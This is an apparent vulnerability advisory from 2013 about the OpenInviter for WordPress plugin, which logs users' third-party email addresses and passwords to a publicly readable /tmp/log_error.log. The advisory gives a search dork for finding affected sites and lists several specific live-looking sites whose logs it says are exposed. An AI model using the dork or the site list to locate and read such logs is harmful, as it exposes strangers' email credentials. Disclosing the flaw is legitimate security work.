WordPress OpenInviter Information Disclosure

2013-01-07 / 2013-01-08
Credit: Ryuzaki Lawlet
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################################## # Title : OpenInviter for WordPress Disclose User Information # Author : Ryuzaki Lawlet # Blog : justryuz.blogspot.com / www.justryuz.com # E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org # Date: Sat Jan 5/2013 (5.47 pm) # Vendor: http://wordpress.org/extend/plugins/openinviter-for-wordpress/ # Type : Web Apps # Tested on : Ubuntu / Window XP # Dork ; inurl:/OpenInviter/tmp/ & inurl:/OpenInviter/tmp/log_error.log ########################################################## ----> #--info about OpenInviter for WordPress: >> Allow your visitors to invite their contacts from Yahoo!, GMail, AOL, Hotmail and other providers to your blog. Exploit: all login user with this plugin have log record with email/password in log_error file in folder /tmp/ and this log_error file is disclose user information like email/password in main mail Yahoo!, GMail, AOL, Hotmail and other providers Example [Years-month-day TIME] Local Debugger ----------DETAILS START---------- TRANSPORT: curl SERVICE: hotmail USER: victim@hotmail.com PASSWORD: ********* STEPS: initial_get : URL: http://login.live.com/login.srf?id=2 METHOD: GET RESPONSE: OK login_post : URL: https://login.live.com/ppsecure/post.srf?id=2&bk=1314918491 METHOD: POST ELEMENTS: PPSX=Passp PwdPad= type= PPFT=ChJRMpJiZhTe4Z7X92sBFddI9M!tmfKtPFtflhAC1VeryloMgt7rVPjP6ADrF!rndQQRq2ZVzysXjuyAYS9NjIe5*OllJx!vK7xAU3ym0ZdKQakLQgOgVnTZn8N81jKUy00TaxC8acf!uMH!sH56Y3GputfpqyBGW1FwrNVFXvun2MwBOPUKs!mWshzl0CYxwuMyGG*0vC1yLpHNXZEgrN!7wezhHpooEH3Sox*ThDrs LoginOptions=3 login=victim@hotmail.com passwd=*********** RESPONSE: OK first_redirect : URL: http://www.hotmail.msn.com/cgi-bin/sbox?t=9ikSpGCZTCYwY3a5CuPibCZnDn3GN5e*OrIs5kzbdHvcgNQ610Cgps14x5lTVph*hWu0fdotwA4j7zZubNVU36uA0ag!cfBdMn9G!BcYoxELnC1Uue0m96tijFO744DPJy&p=9TSxWDG0OAapNedMZ1LMYVhOLboD26IovMvgl2rTjU5pSHOcPyYJWT8vdIcp7B0!9asl4R0AUTIXJnwxk7tqrNDQFa8jRiV7P3DsXuMRz4HrkvEmy3oX8VvFMHMhrOm0vX6C3OSrjvPpmuluxkGCAviJzvHjPDhT4YhLdhpNW0U4mVYL7rTKlTayPOqjGXnEAA&mkt=EN-US&lc=1033&id=2 METHOD: GET RESPONSE: FAILED ----------DETAILS END---------- #--Demo / live http://brXfo.com/cares/wp-content/plugins/contest/OpenInviter/tmp/log_error.log http://www.123eXloyee.com/wp-content/plugins/contest/OpenInviter/tmp/log_error.log http://realestatXegalopolis.com/in/wp-content/plugins/contest/OpenInviter/tmp/log_error.log http://www.learXssion.net/lp/wp-content/plugins/contest/OpenInviter/tmp/log_error.log and many at google :v.... #----> Screenshot / Preview http://i.imgur.com/tKILJ.png <!---- #==================================================<Greet>==================================================# # Sbkiller * Xay * HeavenSe7en * Lonely * Skiddo * Ben * DzDzul * Sykes * RedJohn * LodVViP * PhiberOptick # # KedAns-Dz * r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) * NuxbieCyber ..all # # CyberSec Crew * Cyber 4rmy * T3D Hacker * DevilSec * RileksCrew * TBD * Newbie3vilc063rs * MyHex * GaySec # # www.1337day.com /.net /.org * packetstormsecurity.org * cxsecurity * All Security and Exploits # #===========================================================================================================#

References:

http://wordpress.org/extend/plugins/openinviter-for-wordpress/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top